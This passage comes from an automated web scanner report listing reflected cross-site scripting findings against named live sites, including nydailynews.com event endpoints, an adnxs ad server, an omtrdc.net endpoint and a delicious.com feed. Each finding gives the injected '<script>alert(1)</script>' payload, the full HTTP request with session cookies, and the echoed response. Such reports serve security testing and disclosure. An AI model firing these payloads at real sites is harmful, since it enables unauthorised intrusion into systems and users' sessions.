GET /ttj?id=553109&cb=6612185646&pt1=0000805764&pt2=0001017406&pt3=1183b254c'-alert(1)-'3820416d3a8&imp_id=v2:I:1313102118:6612185646:0000805764:0001017406:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000805764/mnum=0001017406/cstr=2758506=_4e445926,6612185646,805764^1017406^1183^0,1_/xsxdata=$XSXDATA/bnum=2758506/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/nydnros_btf?t=1313102150278&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImKQDEAoYAiACKAIwv_v88QQQv_v88QQYAQ..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6W^#Wxroe5'Qr*isq44:$W)PwtCL3Wkk.A$=koM-QuhP/]Koq9!Np4.bwxgRWIv/%+A:(Sm-lS>S/<%G(qFQ657r2SJx@>1BJcXdvLbw%eg@.oeBE[0W*!?=d3UhDo(M5j%8QLDVbUf/cTK7Tu/h$*'[v-OIQ?^J[pX.=us9OGX%wo_^V(; uuid2=3539656946931560696

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 12-Aug-2011 22:37:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3539656946931560696; path=/; expires=Wed, 09-Nov-2011 22:37:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYAiACKAIwoLOR8gQQoLOR8gQYAQ..; path=/; expires=Wed, 09-Nov-2011 22:37:20 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6W^#Wxroe.<ed*ist544(8y#/m1[3Nc?tO=4X@hL+.Kd6c?b+fuhR+)g'<6_vh7fQ1k@_^]+bUxTbyXA)qJ8sg`L(m<E@fRp%^ex]h1wbM6.FBu=<v!>MH%v>fAp7WP*Xu^!ccw3[EoMfB3[?@tGV5Iprw.k.r!*B@yUR1!h; path=/; expires=Wed, 09-Nov-2011 22:37:20 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 11 Aug 2011 22:37:20 GMT
Content-Length: 1239

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/77160/4?mpt=1313102240}&Perf_Tracker_1=0000805764&Perf_Tracker_2=0001017406&Perf_Tracker_3=1183b254c'-alert(1)-'3820416d3a8&ext_id=2984424249090132697&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=300x250&adid=344452&mpvc=http://ib.adnxs.com/click%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANlKFNoKzmop-HCZRD1j
...[SNIP]...

1.223. http://events.nydailynews.com/json [jsonsp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /json

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload aa7d0<script>alert(1)</script>09589a620ba was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?fields=id,name,zurl&has_editors_pick=454&jsonsp=Zvents_load_ZventsWidget1aa7d0<script>alert(1)</script>09589a620ba&limit=3&search=true&srss=6&st=event&when=today HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECILcmFkaXVzaRkiCWNpdHkiDU5ldyBZb3JrIgplcnJvckYiDWxhdGl0dWRlZho0MC43NTYxMDAwMDAwMDAwMDQAQLgiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--4af12862644ffd881c2159b4b7c99cd5594844a4; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:21 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 50.23.123.106
X-Runtime: 47
ETag: "ed2f54a50d5601d0052c97baa13fdce9"
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www29
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECILcmFkaXVzaRkiCWNpdHkiDU5ldyBZb3JrIgplcnJvckYiDWxhdGl0dWRlZho0MC43NTYxMDAwMDAwMDAwMDQAQLgiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--4af12862644ffd881c2159b4b7c99cd5594844a4; path=/; expires=Fri, 11-Nov-2011 22:35:21 GMT; HttpOnly
Content-Length: 1095

Zvents_load_ZventsWidget1aa7d0<script>alert(1)</script>09589a620ba('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Stomp","id":175823405,"startTime":"Thu Aug 11 20:00:00 UTC 2011","endTime":null,"zurl":"/new-york-ny/events/show/175823405-stomp"},{"name"
...[SNIP]...

1.224. http://events.nydailynews.com/json [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /json

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 67f36<script>alert(1)</script>5a44214f354 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?fields=id,name,zurl&has_editors_pick=454&jsonsp=Zvents_load_ZventsWidget1&limit=3&search=true&srss=6&st=event67f36<script>alert(1)</script>5a44214f354&when=today HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECILcmFkaXVzaRkiCWNpdHkiDU5ldyBZb3JrIgplcnJvckYiDWxhdGl0dWRlZho0MC43NTYxMDAwMDAwMDAwMDQAQLgiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--4af12862644ffd881c2159b4b7c99cd5594844a4; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 50.23.123.106
X-Runtime: 17
ETag: "345570b36170ce09afb9bd1922c9dc79"
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www20
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECILcmFkaXVzaRkiCWNpdHkiDU5ldyBZb3JrIgplcnJvckYiDWxhdGl0dWRlZho0MC43NTYxMDAwMDAwMDAwMDQAQLgiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--4af12862644ffd881c2159b4b7c99cd5594844a4; path=/; expires=Fri, 11-Nov-2011 22:35:27 GMT; HttpOnly
Content-Length: 264

Zvents_load_ZventsWidget1('callback({"rsp":{"status":"error","msg":"Invalid search: event67f365a44214f354 is not a valid search category.","content":{"next_page":false,"identifier": "st=event67f36<script>alert(1)</script>5a44214f354&when=today&ssi=0&srss=4"}}})')

1.225. http://events.nydailynews.com/partner_json/search [image_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The value of the image_size request parameter is copied into the HTML document as plain text between tags. The payload a2960<script>alert(1)</script>23d031d555e was submitted in the image_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumba2960<script>alert(1)</script>23d031d555e&v=&cat=5%2C6%2C7%2C62%2C63%2C64&radius=75&where=New+York%2C+NY&tag=&when=next+30+days&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:35 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 455
ETag: "2db2f2300aa255ecfb1ee8c22ab5041a"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: b145210b425eb01eee94d1c7b06bfb5dc9c830e7
Z-REQUEST-HANDLED-BY: www28
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2131

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"The Freedom Party NYC","has_tickets":false,"tickets_on_sale":null,"venue_id":861747,"id":199524386,"images":[{"url":"http://www.zvents.com/images/internal/5/4/7/5/img_11635745_thumba2960<script>alert(1)</script>23d031d555e.jpg?resample_method=scaled","height":null,"width":null}],"starttime":"Fri Aug 12 23:00:00 UTC 2011","zurl":"/new-york-ny/events/show/199524386-the-freedom-party-nyc"},{"name":"Pacha Teen Night with Dj
...[SNIP]...

1.226. http://events.nydailynews.com/partner_json/search [jsonsp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 8b9c9<script>alert(1)</script>deca5adb594 was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=5%2C6%2C7%2C62%2C63%2C64&radius=75&where=New+York%2C+NY&tag=&when=next+30+days&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_08b9c9<script>alert(1)</script>deca5adb594 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:36:11 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 92
ETag: "ef147786317863042bcdeb82556459d0"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: be1188d01917925547700abedbea482ea7c8b840
Z-REQUEST-HANDLED-BY: www12
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 1958

jsp_08b9c9<script>alert(1)</script>deca5adb594('callback({"rsp":{"status":"ok","content":{"events":[{"name":"2011 Lincoln Center Out Of Doors: 28th Annual Roots of American Music Festival","has_tickets":false,"tickets_on_sale":null,"venue_id":2181
...[SNIP]...

1.227. http://events.nydailynews.com/partner_json/search [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 6019a<script>alert(1)</script>64a6f8607b8 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=5%2C6%2C7%2C62%2C63%2C64&radius=75&where=New+York%2C+NY&tag=&when=next+30+days&what=&nbh=&rand_spn=5&st=event6019a<script>alert(1)</script>64a6f8607b8&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:36:04 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 11
ETag: "e4fa1ff862b60744626a3b07ce01b240"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: da1f8520773bf64cff87fdc83099acf06489f7b0
Z-REQUEST-HANDLED-BY: www21
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 131

{"rsp":{"status":"failed","msg":"Invalid search: event6019a<script>alert(1)</script>64a6f8607b8 is not a valid search category."}}

1.228. http://events.nydailynews.com/partner_json/search [when parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The value of the when request parameter is copied into the HTML document as plain text between tags. The payload d5cfb<script>alert(1)</script>2dd8a5df4aa was submitted in the when parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=5%2C6%2C7%2C62%2C63%2C64&radius=75&where=New+York%2C+NY&tag=&when=next+30+daysd5cfb<script>alert(1)</script>2dd8a5df4aa&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:53 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 19
ETag: "e3834b5cda8e7aef83a32aa6f27b09ac"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: 19ae35a7fb298d27c4555c7da507d4f846376446
Z-REQUEST-HANDLED-BY: www30
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 476

{"rsp":{"status":"failed","msg":"Unrecognized date format: next 30 daysd5cfb<script>alert(1)</script>2dd8a5df4aa is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...

1.229. http://exacttarget.tt.omtrdc.net/m2/exacttarget/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exacttarget.tt.omtrdc.net
Path:   /m2/exacttarget/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 10742<script>alert(1)</script>b543d8110c0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/exacttarget/mbox/standard?mboxHost=www.exacttarget.com&mboxSession=1314893721327-888860&mboxPage=1314893721327-888860&screenHeight=1200&screenWidth=1920&browserWidth=1033&browserHeight=852&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=et_beta10742<script>alert(1)</script>b543d8110c0&mboxId=0&mboxTime=1314875721479&mboxURL=http%3A%2F%2Fwww.exacttarget.com%2F&mboxReferrer=http%3A%2F%2Fwww.iab.net%2Fsite_map&mboxVersion=40 HTTP/1.1
Host: exacttarget.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.exacttarget.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 203
Date: Thu, 01 Sep 2011 16:15:53 GMT
Server: Test & Target

mboxFactories.get('default').get('et_beta10742<script>alert(1)</script>b543d8110c0',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1314893721327-888860.19");

1.230. http://feeds.delicious.com/v2/js/awsbuzz [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /v2/js/awsbuzz

Issue detail

The value of the count request parameter is copied into the HTML document as plain text between tags. The payload 63266<script>alert(1)</script>229a106f66a was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss&count=1063266<script>alert(1)</script>229a106f66a&sort=date HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:38 GMT
Server: nginx/1.0.6
Content-Length: 751
Connection: keep-alive

if (typeof window.Delicious == 'undefined') window.Delicious = {};
Delicious.Linkrolls_CB_92228 = function(posts) {
